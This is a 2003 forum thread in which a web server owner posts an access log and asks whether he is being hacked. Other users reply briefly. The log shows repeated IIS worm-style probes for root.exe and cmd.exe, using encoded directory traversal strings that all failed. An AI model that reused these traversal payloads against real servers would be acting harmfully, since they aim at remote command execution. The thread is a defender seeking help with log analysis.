View previous topic :: View next topic |
Author |
Message |
Vitalichka -
Joined: 25 Jan 2003 Posts: 7
|
Posted: Sat Jan 25, 2003 11:22 pm Post subject: Check my access log please! Am I being hacked? |
|
|
I have a question, I looked at my access log, and noticed that I received 31 hits and 31 of those hits were both HTML hits and Error hits. And if you look at the access log, it looks like someone is trying to hack in. When I trace the IP, it comes out to an AT&T facility.
[b]here's the log.
12.254.161.22 - - [25/Jan/2003:12:45:33 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:37 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:38 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:38 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:37 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:38 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:42 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:45 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:46 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:46 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:47 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:45 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:46 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:49 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:50 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:53 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:53 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:54 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:54 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:55 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:04 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:04 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:05 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:09 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:09 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:50 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:50 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
:?: [/b] |
|
Back to top |
|
|
tdkyo -
Joined: 23 Dec 2002 Posts: 55
|
Posted: Sat Jan 25, 2003 11:25 pm Post subject: |
|
|
dunno but e-mail att and yell at them to check this situation out. Something tells me this is bad... |
|
Back to top |
|
|
Vitalichka -
Joined: 25 Jan 2003 Posts: 7
|
Posted: Sat Jan 25, 2003 11:26 pm Post subject: |
|
|
I mean that's 56 hits 56 Error Hits and 56 HTML Hits.
and the IP's are from the same range.
Thank you |
|
Back to top |
|
|
Vitalichka -
Joined: 25 Jan 2003 Posts: 7
|
Posted: Sat Jan 25, 2003 11:28 pm Post subject: |
|
|
[quote="tdkyo"]dunno but e-mail att and yell at them to check this situation out. Something tells me this is bad...[/quote]
Why would you say that?
Wouldn't it be a waste of time yelling at the incompitent technicians?
And also, I don't think you can run any kind of server through ATT service. |
|
Back to top |
|
|
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|
|
Back to top |
|
|
|